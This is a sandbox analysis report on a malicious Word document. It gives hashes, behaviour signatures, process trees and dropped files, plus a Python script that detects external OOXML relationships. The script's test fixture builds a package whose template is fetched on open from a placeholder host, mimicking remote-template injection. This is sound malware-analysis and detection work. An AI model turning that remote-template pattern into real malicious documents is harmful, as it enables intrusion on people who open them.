Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags
    arch:x64 arch:x86 image:win7-20240705-en locale:en-us os:windows7-x64 system
  • submitted
    15/08/2024, 18:38

General

  • Target

    9b2c4bb79d5f2601d627f4157d0f58ff_JaffaCakes118.doc

  • Size

    235KB

  • MD5

    9b2c4bb79d5f2601d627f4157d0f58ff

  • SHA1

    f52b8b57b92c899973b4b3ee1c88ce792b55e587

  • SHA256

    503dc4cb42caf34593bb5c25ed0b6eb44a6487f98be0866e14db37f8df050cee

  • SHA512

    535d9b2c78654bc52b7c79e169c3ca4c96a3e689f0b9fbca3f5a3e920709746d2596db61707b1ed1f758a662be8161687b353d943efcafce5d0285d9627158db

  • SSDEEP

    3072:LUwxv5OsmqrmrAKHIedS9DKJlzoQzVT2i:LUgv5O4rmECU92vzoQhyi

Score
7/10

Malware Config

Signatures

  • Abuses OpenXML format to download file from external location 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9b2c4bb79d5f2601d627f4157d0f58ff_JaffaCakes118.doc"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
      PID:2588
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    1⤵
    • Abuses OpenXML format to download file from external location
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:1108
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2504
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    1⤵
    • Abuses OpenXML format to download file from external location
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:1988
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    1⤵
    • Abuses OpenXML format to download file from external location
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:1272
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    1⤵
    • Abuses OpenXML format to download file from external location
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    PID:1532
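The "Abuses OpenXML format to download file from external location" signature fires when a part relationship in an OOXML package (a `.rels` entry with `TargetMode="External"`) points at a URL that Word or Excel resolves when the document opens, so the fetch happens with no macro involved. Here it is tagged on WINWORD and on every EXCEL instance started with `/automation -Embedding`, which is how Excel runs as the OLE server for objects embedded in a Word document, so the offending relationships are likely inside embedded workbooks rather than in the .doc container itself. The script below is an added example and not code from this report or from Triage: it walks the `.rels` parts of a package and reports external relationships, and carves OOXML packages out of a binary container so the same check can be run against embedded objects. The sample package, the `template.example` URL and the `AUTO_FETCH_TYPES` list are constructed for the example and are not indicators taken from this analysis.

```python
"""Static check for OOXML external relationships (remote template, linked
OLE object, external workbook link). Added example; sample data and the
AUTO_FETCH_TYPES list are constructed here, not taken from the report."""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List, NamedTuple, Tuple
from urllib.parse import urlparse

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ZIP_LOCAL_HEADER = b"PK\x03\x04"
ZIP_EOCD = b"PK\x05\x06"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# Relationship types Office resolves on open without user interaction.
# Assumption: illustrative list, not exhaustive; hyperlinks need a click.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "frame", "externalLinkPath", "image"}


class ExternalRel(NamedTuple):
    part: str         # the .rels part that declares the relationship
    rel_type: str     # last path segment of the relationship Type URI
    target: str       # Target attribute exactly as written in the package
    auto_fetch: bool  # off-host target of a type Office resolves on open


def external_relationships(package: bytes) -> List[ExternalRel]:
    """Walk every .rels part of an OOXML package and return each
    relationship declared with TargetMode="External"."""
    found = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                scheme = urlparse(target).scheme.lower()
                off_host = scheme in {"http", "https", "ftp", "file"} or target.startswith("\\\\")
                found.append(ExternalRel(name, rel_type, target, off_host and rel_type in AUTO_FETCH_TYPES))
    return found


def carve_packages(blob: bytes) -> List[bytes]:
    """Carve OOXML packages out of an arbitrary byte blob, e.g. a legacy .doc
    whose ObjectPool storage holds embedded workbooks. Each local file header
    is paired with the next end-of-central-directory record; a stream that
    the CFB sector layout has fragmented fails validation here and must be
    extracted with an OLE parser before scanning."""
    packages, pos = [], 0
    while True:
        start = blob.find(ZIP_LOCAL_HEADER, pos)
        if start < 0:
            return packages
        eocd = blob.find(ZIP_EOCD, start)
        if eocd < 0:
            return packages
        end = eocd + 22 + int.from_bytes(blob[eocd + 20:eocd + 22], "little")
        candidate = blob[start:end]
        try:
            with zipfile.ZipFile(io.BytesIO(candidate)) as z:
                if "[Content_Types].xml" in z.namelist():
                    packages.append(candidate)
            pos = end         # skip past this archive
        except zipfile.BadZipFile:
            pos = start + 1   # stray 'PK' bytes, keep searching


def scan(data: bytes) -> Tuple[str, List[ExternalRel]]:
    """Classify the container and return every external relationship found in
    the package itself or in any OOXML package embedded in it."""
    if data.startswith(ZIP_LOCAL_HEADER):
        return "ooxml", external_relationships(data)
    container = "ole" if data.startswith(OLE_MAGIC) else "unknown"
    found = []
    for pkg in carve_packages(data):
        found.extend(external_relationships(pkg))
    return container, found


def build_sample_package() -> bytes:
    """Constructed docx-like package: a remote attachedTemplate (fetched on
    open) plus an ordinary hyperlink (needs a click). URLs are placeholders."""
    def rels(body: str) -> str:
        return f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{RELS_NS}">{body}</Relationships>'
    od = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
    settings = rels(f'<Relationship Id="rId1" Type="{od}attachedTemplate" '
                    f'Target="http://template.example/t.dotm" TargetMode="External"/>')
    document = rels(f'<Relationship Id="rId1" Type="{od}styles" Target="styles.xml"/>'
                    f'<Relationship Id="rId2" Type="{od}hyperlink" Target="https://example.org/" TargetMode="External"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/_rels/settings.xml.rels", settings)
        z.writestr("word/_rels/document.xml.rels", document)
    return buf.getvalue()


def build_sample_container() -> bytes:
    """Stand-in for a legacy .doc: OLE magic, padding, the package, trailing
    bytes. Not a valid CFB file, just enough to exercise carving."""
    return OLE_MAGIC + b"\x00" * 504 + build_sample_package() + b"\xff" * 64


if __name__ == "__main__":
    for label, data in (("package", build_sample_package()), ("container", build_sample_container())):
        kind, rels_found = scan(data)
        print(f"{label}: {kind}")
        for r in rels_found:
            print(f"  {r.part}: {r.rel_type} -> {r.target} [{'FETCHED ON OPEN' if r.auto_fetch else 'external'}]")
```

A hit with `auto_fetch` set means the client will request that URL as soon as the document is rendered, which is the outbound connection to look for in the Network section of a sandbox run; a hyperlink-type hit is worth recording but only fires on a click. For a real legacy .doc, extract the embedded package streams with an OLE parser rather than relying on the carver when the container is large enough for CFB to have fragmented them.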

Network

MITRE ATT&CK Enterprise v15

Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      171a68a53ee98d54753cf8ee7eab1c70

      SHA1

      ee06d55fe498150aa01255e23357f8c972be2b12

      SHA256

      a55113c1bfbfef9b9990eaeb71263a9473c63498df9c2883933c25e88a5a22eb

      SHA512

      7a289616a00248d2ae8af93ae996327f9e901397e31d0c3fd0595ef7fd1d017444c669674ca47a22cb1406d35332706e0e040ad4d79a2026bc2fa43d84d85125

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{923F8D1B-D2CD-495F-A976-A95EC24AFBED}.FSD

      Filesize

      128KB

      MD5

      21cfa2cbb0d7013ad0a590c93eb1c6ba

      SHA1

      c0f9423a621180d8c4a6b794f5d4ee28d3f2883b

      SHA256

      8ffd7949d6c7a9fb3f69cbfcff244be39950215b91183181c2bdb458b6e6ab44

      SHA512

      7058e22e586c4f217f4e40049e17c3099f831fb61b55657138738e8339e759913a7a381e9af0781ddc328809d69cd9b5686cc562cbdb5f8dfac3579a24b16e9f

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{923F8D1B-D2CD-495F-A976-A95EC24AFBED}.FSD

      Filesize

      128KB

      MD5

      342edc4a78eebe1f414a800d7d22aa66

      SHA1

      9d8b9ee3fa339daf24fa79584102f897c403b948

      SHA256

      f65014a28e9dbf632cb668e7d892d1bb6867650f981babb565fb02277f4700ae

      SHA512

      73acd6d811c3aa1797fa41464960effac4abca1b1e623752e5a692ad9421083a5ad1f8ac1337ebc1bd9181a2e1c351031e8ce89b0128052bd693f11ff8b94616

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

      Filesize

      114B

      MD5

      9f0a0dc8ec5233bc152fbb254a6c15fd

      SHA1

      c62514fa378a4710969a81e2b0e8a5481549aeb4

      SHA256

      ef2867e02bbcce90594f5707f7fc65eb35764f2f2deb26cbeb6078182f1e85fd

      SHA512

      1bca94ceca2ba4041d4ebcdd25320f5713e29dd00709dbd6d51dfe7897b0160465842fdde2a8210a5af5494b55af9c8c1ba7eff96e6622f64acb44ab6f911d8d

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      7bfb2ea79bbb0e4a2652a6ca1686fc38

      SHA1

      ea86543cb836e1ee140c739657ca26bd6c8f350d

      SHA256

      41069815ddc2f16a4dce6d794528699a02cd781bd0afaab72c5deaba9f93fb5a

      SHA512

      249130a9a141182b06531f66446c961e5af1b2c31e3afd90ea69668809f4dd7454b1d55089360dea1bd6f8435a4a984da4059eb8046036ad31d5b43427d65e00

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      93fc4096fc7d532811667196a7fd882e

      SHA1

      a86ffe20254f8594042c1348d82118258589f6aa

      SHA256

      85f3a46eb28f588c3c7b13710b0c85202c5439c52dccb91b1c82318ab0832481

      SHA512

      e9858007b69a9c93d2af83ee4f707ce54ffd7df9d49aa152b00a9a497635bbbf7f866e8c798522047d4deeddad72aecb9bb683c8512609e9fa75be2f9446a52c

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{8047D201-C4CE-47B6-BB9B-2A851C283873}.FSD

      Filesize

      128KB

      MD5

      86e4474e37c1bdca7d37b53d8af416a8

      SHA1

      16c12a61d7874ad44b319ee3f407978fe54732fa

      SHA256

      56a5fc94b6213903ecb708f61514f38a556f57ee26903215ba869387502a9e97

      SHA512

      2d8ecf88915fc6fe8ec0920ccc1f6de8ecc800aa6971bb36bc8171e2c639732bf38bcfd09e58874755f553c23c6630957b0d837513e0745c4dc652ccea934f5d

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

      Filesize

      114B

      MD5

      bace647b431aec75d85ad5e7425616c6

      SHA1

      e1910da1e4d5c07f4be25a90291c838ea2973e59

      SHA256

      5665dfc70570bd3dd16226ad5987af1891f14c8d7fe9da2b6dae3a17e245c403

      SHA512

      569debe8fcf4138f4b1f45c4b19dc82b8ba8923f06ec536c2845754ec07e6d1f77edf44d16a69f0a35de43827881dacb23b19372694d6e14f0b797396d22ddd9

    • C:\Users\Admin\AppData\Local\Temp\VBE\MSForms.exd

      Filesize

      143KB

      MD5

      d9d315fe1b69ef2235ed23984012c3c1

      SHA1

      1d3a78861f14241b6efd4cd5064d11bf4d2b9586

      SHA256

      330a63321a52d7a1ea048532cdd71dc1f39b4a90466d8a9134548ab4add985a3

      SHA512

      9f3546bb6c925c4a6d6e6c498839912154fdc230a3d03ef852553184de95eb01171af6bdf280164a9e3702500429980cd1a086e7fc49498dfb98ab494059ab2f

    • C:\Users\Admin\AppData\Local\Temp\{BC5F7963-A937-44DA-B22C-E6F6E64ABD4E}

      Filesize

      128KB

      MD5

      250b152a526ef5b9274079a347ca70bc

      SHA1

      69efbb6c0ca9c29309e0aa3185119ced3234c58e

      SHA256

      bd37243e3a68a208dce9e604db60b6e7b05b0f30fc4e2353498b93fa5be8c714

      SHA512

      ef551817feaf479973a1a87a12a5ecdf03b02b12fec3f54a5ad6db912558bfbae8ca32977d539b90475290597475b9e838236d26a5435f2a25841189298706a0

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      068004f27e99371d76894de5511fdeaa

      SHA1

      574ac17490c79156f35feeb63d902785972ee56e

      SHA256

      957b09c221db176239bf9cad848ea21f2e1adcaca0b9dc0d839439c4d35a2f5e

      SHA512

      be98fedb4559e8fff9c20dad657746bc77ee9fba6842cb920db218d048c988b543a9b722fa6e1d83f740bca013521aa6b25cf631fc7e6de4557acce66ab9c9b0

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • memory/1108-1018-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2504-1031-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1435-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1032-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1489-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1030-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1029-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1077-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1195-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1242-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1147-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1291-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1033-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1387-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1339-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2504-1034-0x0000000000690000-0x0000000000790000-memory.dmp

      Filesize

      1024KB

    • memory/2748-60-0x000000000ED40000-0x000000000EE40000-memory.dmp

      Filesize

      1024KB

    • memory/2748-59-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/2748-9-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

    • memory/2748-2-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

    • memory/2748-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2748-0-0x000000002F3A1000-0x000000002F3A2000-memory.dmp

      Filesize

      4KB